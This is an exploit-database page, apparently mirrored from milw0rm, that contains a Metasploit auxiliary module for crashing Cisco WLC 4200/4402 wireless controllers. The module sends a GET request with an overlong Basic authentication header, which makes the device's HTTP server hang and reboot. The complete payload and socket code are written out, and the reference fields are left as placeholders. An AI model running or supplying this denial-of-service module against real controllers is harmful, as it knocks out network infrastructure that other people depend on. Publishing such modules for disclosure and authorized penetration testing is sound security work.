Cisco WLC 4402 - Basic Auth Remote Denial of Service (meta)

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Trigger Cisco WLC 4200 HTTP server Do


                                                require &#39;msf/core&#39;


class Metasploit3 &#60; Msf::Auxiliary

        include Msf::Exploit::Remote::Tcp
        include Msf::Auxiliary::Dos

        def initialize(info = {})
                super(update_info(info,
                        &#39;Name&#39;           =&#62; &#39;Cisco WLC 4200 Basic Auth Denial of Service&#39;,
                        &#39;Description&#39;    =&#62; %q{

                                This module triggers a Denial of Service condition in the Cisco WLC 4200
                                HTTP server. By sending a GET request with long authentication data, the
                                device becomes unresponsive and reboots.  Firmware is reportedly vulnerable.
                        },
                        &#39;Author&#39;                =&#62; [ &#39;Christoph Bott &#60;msf[at]bott.syss.de&#62;&#39; ],
                        &#39;License&#39;        =&#62; MSF_LICENSE,
                        &#39;Version&#39;        =&#62; &#39;$Revision: 5949 $&#39;,
                        &#39;References&#39;     =&#62;
                                [
                                        [ &#39;BID&#39;, &#39;???&#39;],
                                        [ &#39;CVE&#39;, &#39;???&#39;],
                                        [ &#39;URL&#39;, &#39;http://www.cisco.com/?????&#39;],
                                ],
                        &#39;DisclosureDate&#39; =&#62; &#39;January 26 2009&#39;))

                register_options(
                        [
                                Opt::RPORT(80),
                        ], self.class)

        end

        def run
                connect

                print_status(&#34;Sending HTTP DoS packet&#34;)

                sploit =
                        &#34;GET /screens/frameset.html HTTP/1.0\r\n&#34; +
                        &#34;Authorization: Basic MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0&#34;

                sock.put(sploit + &#34;\r\n&#34;)

                disconnect
        end

end

# milw0rm.com [2009-07-27]

01 Jul 2014 00:00Current

6.7Medium risk

Vulners AI Score6.7